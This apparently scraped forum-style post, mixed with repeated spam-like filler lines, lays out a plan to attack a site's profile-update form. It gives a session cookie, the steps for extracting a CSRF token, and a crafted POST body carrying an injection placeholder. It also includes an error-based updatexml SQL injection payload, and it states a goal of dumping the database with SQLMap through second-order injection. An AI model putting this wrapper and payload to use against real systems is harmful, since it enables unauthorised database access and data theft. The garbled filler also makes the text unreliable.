blog.terahost.exam
I first need to send a GET request to this url: http://me.terahost.exam/profile
Use this as the cookie.
Cookie: _sid_=4g63ah9pvms340pvinbhdk60j0

Once you send a request in the response the following html code will be available.
<input type="hidden" name="acdt67gshfuiuasfsg" value="b6d67a24906e8a8541291882f81d31ca">
                      		
I need the CSRF token. In this request it is : b6d67a24906e8a8541291882f81d31ca

Just store it in a variable.

blog.terahost.exam How to get it for free? blog.terahost.exam
Next is to use this in the update form for SQL injection.

http://me.terahost.exam/update-user
Use the same cookie as the cookie.
Cookie: _sid_=4g63ah9pvms340pvinbhdk60j0

POST Data:
"name=1&surname=1&email=1%401.com&street_address=8850+Egestas+Ave&city=Berlin". $INJECTION .&zip=29977-647&iban=GT33211377800379210569053628&password=&uID=500&acdt67gshfuiuasfsg=".$TOKEN;

Please note the 2 variables $INJECTION where the the $GET['injection'] from the user. Place the extracted the $TOKEN in that place.
blog.terahost.exam How to get it? blog.terahost.exam

In this way we can easily perform sql injection like this and can pass this to SQLMap. This is my goal to dump the database using SQLmap in this 2nd order injection.

localhost/ourscript.php?injection=' * updatexml(1,concat(0x7e,(select(schema()))),0) *'
blog.terahost.exam